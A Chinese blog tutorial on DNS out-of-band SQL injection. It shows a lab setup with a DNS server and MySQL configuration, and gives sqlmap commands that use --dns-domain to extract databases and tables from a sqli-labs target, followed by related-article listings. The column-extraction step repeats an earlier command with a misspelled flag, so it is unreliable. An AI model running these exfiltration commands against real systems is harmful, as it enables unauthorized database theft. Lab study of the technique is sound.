DNS外带注入SQLMAP

已于 2022-08-06 20:33:30 修改
阅读量646 收藏
点赞数
文章标签: 服务器 linux 运维
于 2022-08-06 20:22:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_31088019/article/details/126172130
版权
本文介绍了如何在Kali Linux和Windows环境中配置SQLMap进行DNS注入测试。首先,详细讲解了设置Windows 2008 R2 DNS服务器的步骤,并提供了下载链接。接着,通过设置MySQL的secure_file_priv参数,允许读取磁盘文件。然后,通过在Kali中使用tcpdump验证DNS服务器配置成功。最后,展示了如何利用SQLMap进行外带DNS注入,包括取库、获取表和列的命令。这是一个针对SQL注入和DNS隧道技术的实际操作指南。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一.实验环境

1.kali(使用sqlmap)
2.windows10(靶机)
3.windows 2008 R2 ( 需要设置dns服务器)下载镜像地址: https://msdn.itellyou.cn/

设置mysql

secure_file_priv为空,就可以读取磁盘的目录
secure_file_priv为D:\,就可以读取D盘的文件
secure_file_priv为null,load_file就不能加载文件
添加一句secure_file_priv=""
在这里插入图片描述

在这里插入图片描述

设置dns服务器

在这里插入图片描述
上面服务器这里填kali的ip,下面是主机首选dns服务器填服务器的ip
在这里插入图片描述

kali输入tcpdump -n port 53ping通有数据包就说明成功(如果ping不通服务器的ip的话就关掉防火墙)
在这里插入图片描述
在这里插入图片描述
也填kali的ip

二.SQLMap使用外带dns注入

取库

输入sqlmap -u "http://192.168.10.195/sqli-labs-master/Less-8/?id=1" --technique=T --dns-domain "hxp1.top" --dbs

在这里插入图片描述

获取表

kali输入sqlmap -u "http://192.168.10.195/sqli-labs-master/Less-8/?id=1" --technique=T --dns-domain "hxp1.top" -D security --tables
在这里插入图片描述

获取到列

输入sqlmap -u "http://192.168.10.195/sqli-labs-master/Less-8/?id=1" --technique=T --dns-domaim "hxp1.top" --dbs
在这里插入图片描述

sqlmap结合dnslog外带注入
newlife1441的博客
08-05 752
目录📓前言📓操作步骤1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置2.环境准备2.1Windows server2008 2.1.1搭建dns服务器2.2测试2.2.1设置靶机的网络的dns为server20082.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 2.2.3server2008中创建转发器2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况2.3开始sqlmap使用dnslog外带注入2.3...
复现dns外带数据结合sqlmap
Alemon7777777的博客
08-06 543
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。#查询库名#方一#方二#查询数据库的默认字符集#查询字符集的排序规则。...
写bat脚本双击执行
qq_35911118的博客
04-08 3137
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
SQL注入DNSlog注入DNS带外查询)
最新发布
2401_89233381的博客
03-14 938
声明:DNSlog注入也是针对的情况。
DNS外带注入
weixin_52501704的博客
10-09 1661
DNS外带注入
SQL注入DNSLog外带注入
dragon的博客
02-21 3337
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
SqlmapDnsCollaborator:Burp扩展,可​​让您将Burp Collaborator用作DNS服务器,以通过Sqlmap渗出数据
02-14
SqlmapDnsCollaborator是一个Burp扩展,可​​让您使用零配置的Sqlmap执行DNS渗透。 您将不需要DNS服务器或公共IP,只需一台具有Sqlmap和Burp的计算机即可。 通常如何使用Sqlmap执行DNS渗透: 您设置了DNS服务器...
mysql dns 注入_数据库DNSLog外带注入-总结
weixin_29279047的博客
01-19 1062
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据带出。of course!这里主讲DNSlog外带注...
sqlmap渗透进阶】DNS-domain注入
记录学习,一起进步
03-18 1292
sqlmap渗透进阶】DNS-domain注入
sqlmap结合dnslog快速注入
qq_52016943的博客
08-08 1226
sqlmap SQL注入
dns缓存
qq_35543858的博客
01-25 840
查看dns缓存 ipconfig/displaydns 清除dns缓存 ipconfig/flushdns DNS缓存介绍 记录种类 A记录是指定域名对应的IP地址。 AAAA记录一个域名对应的IPv6地址 NS记录 是指定由哪个DNS服务器解析你的域名。 MX记录 是指邮件交换记录,记录了在当前网络下,存在的mail服务器 CNAME记录 是指别名记录,允许多个域名对应一个ip ...
DNS外带数据结合sqlmap
S_cx666的博客
08-09 731
DNS外带数据结合sqlmap
渗透测试---手把手教你SQL注入(4)--DNSLOG外带注入
weixin_52796034的博客
10-10 1208
通常我们面对SQL注入过程中没有回显的情况时,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,需要花费大量时间进行测试,并且还可能需要对目标服务器发送大量请求,这会导致我们的IP容易被目标服务器封掉.
SQL注入--DNSlog外带注入--理论
m0_56019217的博客
11-23 1032
DNS的作用是将域名解析为IP而DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名访问信息。可以理解为DNS服务器上的日志文件。比如,以点为分隔,从右向左依次是顶级域名、二级域名、三级域名。即,net是顶级域名,csdn是二级域名,blog是三级域名。域名不区分大小写。在进行ping命令时会使用DNS解析:这里就是被解析后,与csdn.com进行了拼接,然后再去执行Ping命令。这里我们界面就回显得到了,也就是得到了的值。这个过程就可以被称为DNSlog外带
DNSlog外带数据注入
C_LCH_2000的博客
08-04 1580
盲注代替 DNS log即DNS日志,域名解析的记录。
DNSlog外带原理及注入分析
热门推荐
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
MySQL注入Dns 注入
baimaozi008的博客
05-29 1200
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。然后1806dl.dnslog.cn的子域名的解析都是在某台服务器,然后他记录下来了有人请求访问了error.1806dl.dnslog.cn,然后在DnsLog这个平台上面显示出来了。
sqlmap数据库注入实战指南
"这篇文档详细介绍了如何使用sqlmap进行数据库注入漏洞测试,强调了sqlmap的强大功能,并提供了在Ubuntu 10.10和Windows 7 (x64)环境下测试的实例。此外,还提供了sqlmap的稳定版本下载链接、更新升级方法以及官方...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

朵拉不会敲代码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值